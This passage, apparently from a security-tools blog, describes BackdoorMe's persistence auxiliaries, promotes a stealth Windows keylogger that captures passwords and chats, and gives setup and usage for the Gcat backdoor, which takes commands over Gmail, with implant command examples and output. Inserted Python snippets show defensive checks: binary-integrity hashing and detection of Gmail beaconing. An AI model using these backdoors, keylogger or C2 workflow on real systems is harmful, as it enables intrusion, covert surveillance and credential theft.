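The Poison module above swaps a utility such as /bin/ls for a wrapper binary. The check a defender would run for that, added here as an example and not part of BackdoorMe: compare every packaged file against the MD5 baseline that dpkg keeps in /var/lib/dpkg/info/&lt;pkg&gt;.md5sums, so that a replaced or removed binary shows up as a hash mismatch. The temporary directory tree, the file contents and the bin/cat, bin/ls and bin/cp entries are all constructed for the demo; point find_poisoned() at a real md5sums file and root="/" to use it on a live system.</div>

```python
import hashlib
import os
import tempfile

def parse_md5sums(text):
    """Parse dpkg md5sums lines, one 'MD5  path-relative-to-root' per line."""
    baseline = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        digest, rel_path = line.split(None, 1)
        baseline["/" + rel_path.strip()] = digest.lower()
    return baseline

def md5_of_file(path):
    """Hash a file in chunks (dpkg records MD5, so that is what we compare)."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def find_poisoned(baseline, root="/"):
    """Return {path: (expected, actual)} for baseline files that are missing
    (actual is None) or whose on-disk hash differs from the package's hash."""
    findings = {}
    for path, expected in baseline.items():
        full = os.path.join(root, path.lstrip("/"))
        if not os.path.isfile(full):
            findings[path] = (expected, None)
            continue
        actual = md5_of_file(full)
        if actual != expected:
            findings[path] = (expected, actual)
    return findings

def demo():
    """Constructed tree: untouched bin/cat, replaced bin/ls, missing bin/cp."""
    root = tempfile.mkdtemp(prefix="binpoison-demo-")
    os.makedirs(os.path.join(root, "bin"))
    # Constructed stand-ins for the bytes the package shipped.
    packaged = {"bin/cat": b"\x7fELF-constructed-cat",
                "bin/ls": b"\x7fELF-constructed-ls",
                "bin/cp": b"\x7fELF-constructed-cp"}
    # Baseline in dpkg's md5sums format, built from the 'packaged' contents.
    md5sums = "".join("%s  %s\n" % (hashlib.md5(data).hexdigest(), rel)
                      for rel, data in packaged.items())
    # What is actually on disk: cat is intact, ls was swapped, cp is gone.
    on_disk = {"bin/cat": packaged["bin/cat"],
               "bin/ls": b"#!/bin/sh\n# constructed stand-in for a swapped binary\n"}
    for rel, data in on_disk.items():
        with open(os.path.join(root, rel), "wb") as f:
            f.write(data)
    return sorted(find_poisoned(parse_md5sums(md5sums), root))

if __name__ == "__main__":
    print(demo())  # ['/bin/cp', '/bin/ls']
```

On a real Debian-derived host the same comparison is what debsums performs, and rpm -Va is the RPM equivalent; a wrapper dropped by the module also fails that check.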
<br />
<b> Auxiliaries </b> <br />
In order to have persistence be more potent, some users may wish to install certain services on a target. To apply an auxiliary module, use the "apply" keyword. <br />
<pre><code>&gt;&gt; apply user
+ User Auxiliary Module added.
</code></pre>
Auxiliaries also support the use of modules, so they can be triggered more stealthily or more often. <br />
<pre><code>&gt;&gt; (user) add startup
+ Startup Module added.
</code></pre>
Currently enabled auxiliaries include: <br />
<ul>
<li> User <ul>
<li> Adds a new user to the target. </li>
</ul>
</li>
</ul>
<br />
<b> Targets </b> <br />
Backdoorme supports multiple different targets concurrently, organized by number when entered. The core maintains one "current" target, to which any new backdoors will default. To switch targets manually, simply add the target number after the command: "use metasploit 2" will prepare the metasploit backdoor against the second target. <br />
<br />
<br />
<div style="text-align: center;">
<b> <span style="font-size: x-large;"> <a href="https://github.com/Kkevsterrr/backdoorme" target="_blank"> Download BackdoorMe </a> </span> </b> </div>
<br />
<b><span style="font-size: x-large;">Windows Spy Keylogger - Software to Log Keystrokes in Stealth Mode for 32-bit/64-bit processes on Windows XP/Vista/7/8/10</span></b> (2015-09-28)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-dZRrHTgwx3k/VghrmP-LhxI/AAAAAAAAEpo/Kc0cvBiJcRc/s1600/windowsspykeylogger.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-dZRrHTgwx3k/VghrmP-LhxI/AAAAAAAAEpo/Kc0cvBiJcRc/s1600/windowsspykeylogger.jpg" /></a></div>
<br />
<div style="text-align: justify;">
<strong>Windows Spy Keylogger</strong> is free software for covertly monitoring all activity on your computer.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
It intercepts everything typed on the keyboard and stores it in a single log file that you can view at any later time. You can track <strong>logins</strong>, <strong>passwords</strong>, <strong>emails</strong>, <strong>chats</strong> and everything else the user types.</div>
<div style="text-align: justify;">
You can also customize various options, including stealth mode, <strong>run at startup</strong> and the log file location. It is <strong>very simple</strong> to use: a single click of a button.
</div>
<div style="text-align: justify;">
<br /></div>
<div>
<div style="text-align: justify;">
One unique feature of this tool is that it can be installed and run on any computer <strong>without administrator</strong> permissions. It also works seamlessly on both <strong>32-bit</strong> &amp; <strong>64-bit</strong> Windows platforms.</div>
</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
It is suitable for parents who want to monitor activities of their children. Also <strong>cyber crime </strong>investigators, penetration testers, forensic analysts will find it very handy in their work.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Windows Spy Keylogger works on all platforms starting from Windows XP to new <strong>Windows 10</strong> version.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b><span style="font-size: large;">
Features</span></b></div>
<ul>
<li style="text-align: justify;">Free tool to monitor keystrokes in stealth mode</li>
<li style="text-align: justify;"> Monitors both 32-bit &amp; 64-bit applications</li>
<li style="text-align: justify;"> Automatically run at Startup</li>
<li style="text-align: justify;"> No need for administrator privileges</li>
<li style="text-align: justify;"> Settings dialog to change various options</li>
<li style="text-align: justify;"> Stores keyboard activities silently to a log file</li>
<li style="text-align: justify;"> Very easy to use with just a click of button</li>
<li style="text-align: justify;"> Displays current status of key logger at any time</li>
<li style="text-align: justify;"> Includes installer for local installation &amp; un-installation</li>
</ul>
<div style="text-align: justify;">
<b><span style="font-size: large;">How to Use?</span></b></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
'Windows Spy Keylogger' is a very easy-to-use tool with a simple GUI.</div>
<div style="text-align: justify;">
Here are the steps:</div>
<ul>
<li style="text-align: justify;">Run 'Windows Spy Keylogger' on your system</li>
<li style="text-align: justify;">It will show you the current status of Keylogger as seen in the screenshots below.</li>
<li style="text-align: justify;">Now you can click the button below to start or stop the keylogger </li>
<li style="text-align: justify;">That's all :)</li>
</ul>
<div style="text-align: justify;">
You can also customize various options (run at startup, log path, version check etc.) in the 'Settings Dialog', opened by clicking the button in the bottom-right corner.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a href="http://securityxploded.com/windows-spy-keylogger-free.php" target="_blank">Download Windows Spy Keylogger</a></span></b></div>
<br />
<b><span style="font-size: x-large;">Gcat - A stealthy Backdoor that uses Gmail as a command and control server</span></b> (2015-06-17)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-vFWXvSnGYyc/VYGTUUggqQI/AAAAAAAAEO4/oJZK_r9uckg/s1600/gcat.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-vFWXvSnGYyc/VYGTUUggqQI/AAAAAAAAEO4/oJZK_r9uckg/s1600/gcat.jpg" /></a></div>
<br />
<div style="text-align: justify;">
A stealthy Python based backdoor that uses Gmail as a command and control server.<br />
</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b><span style="font-size: large;">Setup </span></b></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
For this to work you need:</div>
<ul>
<li style="text-align: justify;">A Gmail account (<strong>Use a dedicated account! Do not use your personal one!</strong>)</li>
<li style="text-align: justify;">Turn on "Allow less secure apps" under the security settings of the account</li>
</ul>
<div style="text-align: justify;">
This repo contains two files:</div>
<ul>
<li style="text-align: justify;"><code>gcat.py</code> a script that's used to enumerate and issue commands to available clients</li>
<li style="text-align: justify;"><code>implant.py</code> the actual backdoor to deploy</li>
</ul>
<div style="text-align: justify;">
In both files, edit the <code>gmail_user</code> and <code>gmail_pwd</code> variables with the username and password of the account you previously setup.</div>
<div style="text-align: justify;">
You're probably going to want to compile <code>implant.py</code> into an executable using <a href="https://github.com/pyinstaller/pyinstaller">Pyinstaller</a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<span style="font-size: large;"><b>Usage</b></span></div>
<pre><code>Gcat

optional arguments:
  -h, --help            show this help message and exit
  -v, --version         show program's version number and exit
  -id ID                Client to target
  -jobid JOBID          Job id to retrieve
  -list                 List available clients
  -info                 Retrieve info on specified client

Commands:
  Commands to execute on an implant

  -cmd CMD              Execute a system command
  -download PATH        Download a file from a clients system
  -exec-shellcode FILE  Execute supplied shellcode on a client
  -screenshot           Take a screenshot
  -lock-screen          Lock the clients screen
  -force-checkin        Force a check in
  -start-keylogger      Start keylogger
  -stop-keylogger       Stop keylogger
</code></pre>
<ul>
<li>Once you've deployed the backdoor on a couple of systems, you can check available clients using the list command:</li>
</ul>
<pre><code>#~ python gcat.py -list
f964f907-dfcb-52ec-a993-543f6efc9e13 Windows-8-6.2.9200-x86
90b2cd83-cb36-52de-84ee-99db6ff41a11 Windows-XP-5.1.2600-SP3-x86
</code></pre>
Each line of output is a UUID string that uniquely identifies the system, followed by the OS the implant is running on.<br />
<ul>
<li>Let's issue a command to an implant:</li>
</ul>
<pre><code>#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -cmd 'ipconfig /all'
[*] Command sent successfully with jobid: SH3C4gv
</code></pre>
Here we are telling <code>90b2cd83-cb36-52de-84ee-99db6ff41a11</code> to execute <code>ipconfig /all</code>; the script then outputs the <code>jobid</code> that we can use to retrieve the output of that command.<br />
<ul>
<li>Let's get the results!</li>
</ul>
<pre><code>#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -jobid SH3C4gv
DATE: 'Tue, 09 Jun 2015 06:51:44 -0700 (PDT)'
JOBID: SH3C4gv
FG WINDOW: 'Command Prompt - C:\Python27\python.exe implant.py'
CMD: 'ipconfig /all'
Windows IP Configuration
Host Name . . . . . . . . . . . . : unknown-2d44b52
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
-- SNIP --
</code></pre>
<ul>
<li>That's the gist of it! But you can do much more as you can see from the usage of the script! ;)</li>
</ul>
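<div style="text-align: justify;">
Gcat's implant polls a Gmail mailbox for jobs and mails results back, and the BeeLogger and Radium keyloggers above exfiltrate their logs through Gmail SMTP on a timer or a keystroke count. The detection logic a defender would run over endpoint network-connection telemetry, added here as an example and not part of any of these projects: flag processes outside a mail-client allow-list that talk to Gmail's SMTP/IMAP endpoints, and measure whether their check-ins are evenly spaced the way a timer-driven implant's are. The log lines, their Sysmon-like field layout and the MAIL_CLIENTS allow-list are constructed for the example.</div>

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Gmail endpoints used for exfiltration (SMTP) and tasking (IMAP).
GMAIL_ENDPOINTS = {("smtp.gmail.com", 465), ("smtp.gmail.com", 587),
                   ("imap.gmail.com", 993)}
# Assumed allow-list: processes for which Gmail traffic is expected.
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}

# Constructed sample log: "ISO-timestamp image-path dest-host dest-port".
SAMPLE_LOG = """\
2015-06-09T06:50:00 C:\\Program Files\\Thunderbird\\thunderbird.exe imap.gmail.com 993
2015-06-09T06:50:04 C:\\Python27\\python.exe imap.gmail.com 993
2015-06-09T06:51:04 C:\\Python27\\python.exe imap.gmail.com 993
2015-06-09T06:52:05 C:\\Python27\\python.exe imap.gmail.com 993
2015-06-09T06:52:30 C:\\Python27\\python.exe smtp.gmail.com 465
2015-06-09T06:53:04 C:\\Python27\\python.exe imap.gmail.com 993
2015-06-09T06:55:00 C:\\Windows\\System32\\svchost.exe login.live.com 443
"""

def parse_events(text):
    """Return (timestamp, image basename, host, port) tuples from the log."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        head, host, port = line.rsplit(None, 2)   # image path may contain spaces
        ts, image = head.split(" ", 1)
        basename = image.replace("/", "\\").rsplit("\\", 1)[-1].lower()
        events.append((datetime.fromisoformat(ts), basename, host, int(port)))
    return events

def beacon_interval(timestamps, max_cv=0.1):
    """Return (mean gap in seconds, periodic?) for sorted timestamps.
    Three or more gaps with a coefficient of variation under max_cv means
    the connections come from a timer, not from a person reading mail."""
    gaps = [(b - a).total_seconds() for a, b in zip(timestamps, timestamps[1:])]
    if len(gaps) < 3:
        return (gaps[0] if gaps else None), False
    avg = mean(gaps)
    return avg, avg > 0 and pstdev(gaps) / avg < max_cv

def find_suspects(text):
    """Flag non-mail-client processes reaching Gmail, with beacon analysis."""
    by_key = defaultdict(list)
    for ts, image, host, port in parse_events(text):
        if (host, port) in GMAIL_ENDPOINTS and image not in MAIL_CLIENTS:
            by_key[(image, host, port)].append(ts)
    findings = []
    for (image, host, port), stamps in sorted(by_key.items()):
        stamps.sort()
        interval, periodic = beacon_interval(stamps)
        findings.append({"image": image, "host": host, "port": port,
                         "connections": len(stamps),
                         "interval_s": None if interval is None else round(interval, 1),
                         "periodic": periodic})
    return findings

if __name__ == "__main__":
    for finding in find_suspects(SAMPLE_LOG):
        print(finding)
```

The constructed python.exe polls IMAP every 60 seconds and is reported as periodic, while the single SMTP connection is reported on its own; thunderbird.exe is allow-listed and svchost.exe never touches a Gmail endpoint.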
<div>
<br /></div>
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a href="https://github.com/byt3bl33d3r/gcat" target="_blank">Download Gcat</a></span></b></div>